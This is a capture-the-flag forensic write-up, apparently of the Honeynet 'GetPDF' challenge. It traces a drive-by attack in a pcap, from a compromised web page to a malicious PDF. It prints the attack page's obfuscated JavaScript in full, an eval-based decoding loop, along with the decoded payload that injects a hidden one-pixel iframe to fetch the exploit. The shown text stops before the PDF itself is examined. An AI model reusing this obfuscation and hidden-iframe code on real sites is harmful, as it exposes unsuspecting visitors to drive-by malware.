GetPDF
Challenge Link: GetPDF
Scenario:
PDF format is the de-facto standard in exchanging documents online. Such popularity, however, has also attracted cyber criminals in spreading malware to unsuspecting users. The ability to generate malicious pdf files to distribute malware is a functionality that has been built into many exploit kits. As users are less cautious about opening PDF files, the malicious PDF file has become quite a successful attack vector. The network traffic is captured in lala.pcap contains network traffic related to a typical malicious PDF file attack, in which an unsuspecting user opens a compromised web page, which redirects the user’s web browser to a URL of a malicious PDF file. As the PDF plug-in of the browser opens the PDF, the unpatched version of Adobe Acrobat Reader is exploited and, as a result, downloads and silently installs malware on the user’s machine.
As a soc analyst, analyze the PDF and answer the questions.
Analysis:
Network Traffic Analysis
The challenge file contains a network capture, lala.pcap. It was opened in Wireshark, where HTTP traffic can be seen. Lets check the HTTP requests (Statistics => HTTP => Requests):
All the HTTP requests originate from the host to blog.honeynet.org.my, with 6 distinct URL paths.
Lets start analyzing this network traffic from start by following HTTP stream (Right click a HTTP packet => Follow => HTTP Stream) to observe the web requests and responses.
An initial GET request to http://blog.honeynet.org.my/forensic_challenge file can be seen, and the server responded with 301 redirect and an HTML page that says “The document has moved” and provides a here hyperlink pointing to http://blog.honeynet.org.my/forensic_challenge/.
On following here hyperlink to http://blog.honeynet.org.my/forensic_challenge/, the server returns the index HTML page containing suspicious JS code that is obfuscated.
The beautified version of above obfuscated JS code is shown below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
var DepanNegw = window;
var DexeTelae = -44;
DexeTelae += 45;
var XayeZebah = 'nedajemac';
var GaDemee = 'e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, ''); // eval
var ZavevTa = 'fazemezarawaseb';
var MezRai = parseInt;
var DayahDet = 'zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame bayap def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer magemefele xelawece denew jafelev haweqa kel vatabaser mag vejefama xeca canapevezejev benaper gezazevaja zeyaxaf wehekeh jecalava set senajaj re kameken bazafakaqewate zaralek yecele kak s hexebeka heha jeyeteg sase wayefewa tey gawewem wefaravavepayeke xedevec gavayedegeqer casehes watenanesajet jelagal payevexebe pejasep heqefagabexemew deheler vejegeca hece rafenadamenaxe jaz fex hekases pazetepajamelew cerasej nevayezabevepeke pex gey dac g dezaleza kekeqebe peyemaf sevanededa cefagey defef cexaqehe sebex galahal zadaxaran lava falamedejegase set law mefe wa mex ces nam j xaxaped gexeqageb feqeled daseze tehadeh zeheteyera xanahef wepahena xarakel gadazecaq tabexape dareq seje lejegagaxavade haf jaz cewe me cag kem fed h legefaz taw keyacah wefereweverewaze rapecame kas fagavev facez yefeley lareke seperene gav lece gahepegesafeve dez gen yeje s waz qas xap c hademax mezezah qepawehe vad zejates pe cehajeg sabebaseqeseda sekesav nebeda cagareg kec fexewel bejewagedegeqene bajesade lav pasepad baraj xecavan vedepe veranake vej heva kejajemacajada wez saj vele x qaj vad fag y qetamefe jaxa kamatare net zeheweh jeme bale cexebedeleneye dab vev kekaxex jetecajek lejekabe qalef bevegeye caxeb beleteqe r hele saxafexazat baz dehakajegeqeneke met mefepexafecebera qwertyu iop asdfghj klzxcvbnmqwer tyuiopa sdfghjklzxcvbnmq hjklzxc vbnmqwer tyu iopasdfghjklzxc vbnmqwe rtyuiopas dfghjkl zxcvbnmqwertyuio pasdfgh jklzxcvbnmqwert yuiopas dfghjk lzxcvbnm qwertyuiop asdfghj klzxcvbnmqwerty uiopasd fghjkl zxcvbnmq werty uio pasdfghjklzxcvb nmqwert yuiopasdfghjklzx cvbnmqwe rty uiopasd fghjklzx uio pasdfghjklzxcvb nmqwert uiopasdfghjklz qwertyui opasdfghjk xcr vbnmqwertyuiopar sdfghjr klzxcvr bnmqwer rtyuiopasdfghjkr lzxcvbnr mqr wertyur iopasr dfghjkr lzxcvbnmqwertyr uiopasdr fghr jklzxcr vbnmqwertr yuiopar sdfr ghjklr zxcvbnmqwertyuir opasdfr ghjr klzxcvr bnmqwertr yuiopar sr dfghjkr lzxcvbnmqwerr dfghjkr lzxcvbnmqwerr tyuiopr asdfgr hjklzxr cvbnmqwertyuior pasdfgr hjklzxcr vbnmqwr ertyur met mefepexafecebera xanahef wepahena feqeled daseze tabexape dareq zexelede l cefagey defef hademax mezezah req batekeqaheteceh zateyene c zekeqay ratevecek veheleqe k dec tec xece jefexazeqayefes cama bapevexeladet keh lanawebasegecaja qefejev qepetekene dacegas relevaj fecasece ber veyayes ba kajebed savaketegemeqe wepecer lamege tere ratavacevejezax gey dasalaje gav yepakekehe'.split(' ');
var ZeJexn = '';
var SerayYafags = String;
var KesXanavn = -50;
KesXanavn += 66;
var XadHef = 78;
var BeZao = 47;
BeZao += -47;
var FeceSabejo = -46;
FeceSabejo += 48;
var GebJep = 92;
var SeWajec = 'ftr9wogmBwJCW5h6aixrPRCs1ZonjHjdjKueMkD'.replace(/[t9wgBwJW56ixPRs1ZnjHjjKuMkD]/g, '');
var MaqTa = 5;
GaDemee = DepanNegw[GaDemee];
SeWajec = SerayYafags[SeWajec];
// Decoding loop
for (var YajMedei = BeZao; YajMedei < DayahDet.length - 1; YajMedei += FeceSabejo) {
ZeJexn += SeWajec(
MezRai(
(DayahDet[YajMedei + BeZao].length - 1).toString(KesXanavn) +
(DayahDet[YajMedei + DexeTelae].length - 1).toString(KesXanavn),
KesXanavn
)
);
}
// Execute the final function
GaDemee(ZeJexn);
There is a for loop that construct the string stored in ZeJexn, and that string is executed at the end of script via GaDemee(ZeJexn).
The variable GaDemee resolves to eval as can be seen below:
1
var GaDemee = 'e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, ''); // eval
To get the final de-obfuscated string without executing it, GaDemee can be replaced with console.log() as can be seen below:
When decoded and printed, the payload was found to be:
1
document.write('<iframe scrolling="no" width="1" height="1" border="0" src="http://blog.honeynet.org.my/forensic_challenge/getpdf.php"></iframe>')
The injected iframe request to http://blog.honeynet.org.my/forensic_challenge/getpdf.php, which is executed on remote server.
This can also be verified in the network capture on Wireshark as shown below. The server then responded by redirecting to http://blog.honeynet.org.my/forensic_challenge/fcexploit.pdf.
Lets now export this PDF fcexploit.pdf from the network capture using Wireshark (File => Export Objects => HTTP) for further analysis.